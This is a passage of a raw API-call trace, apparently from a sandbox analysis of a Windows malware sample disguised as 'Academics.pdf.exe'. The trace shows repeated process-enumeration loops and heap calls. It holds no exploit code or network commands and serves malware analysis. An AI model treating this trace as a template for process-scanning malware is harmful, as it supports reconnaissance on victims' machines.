| out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0303.006] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0303.007] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0303.007] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0303.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0303.009] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0303.009] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.010] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.011] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0303.012] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.012] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0303.013] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.014] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0303.015] CloseHandle (hObject=0x294) returned 1 [0303.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0303.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0303.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0303.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0303.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0303.015] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0303.015] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0303.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0303.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0303.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0303.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0303.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0303.016] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0303.018] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.018] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0303.019] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0303.020] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.021] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0303.022] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.023] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0303.023] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0303.024] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0303.025] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0303.026] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.027] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.028] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.029] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.029] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.030] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0303.031] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.031] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.032] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0303.033] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0303.034] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0303.034] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0303.035] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.036] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0303.037] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0303.038] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0303.039] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0303.039] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0303.040] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0303.041] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0303.042] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0303.043] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0303.044] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0303.045] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0303.045] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0303.047] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0303.047] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0303.048] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0303.049] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0303.050] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0303.051] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0303.052] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0303.052] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.053] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.054] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0303.055] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.056] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0303.057] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0303.058] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0303.058] CloseHandle (hObject=0x294) returned 1 [0303.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0303.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0303.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0303.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0303.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0303.059] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0303.059] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0303.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0303.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0303.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0303.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0303.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0303.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0303.059] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0303.061] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.062] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0303.063] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0303.064] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.065] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0303.066] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.066] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0303.067] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0303.068] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0303.069] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0303.070] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, 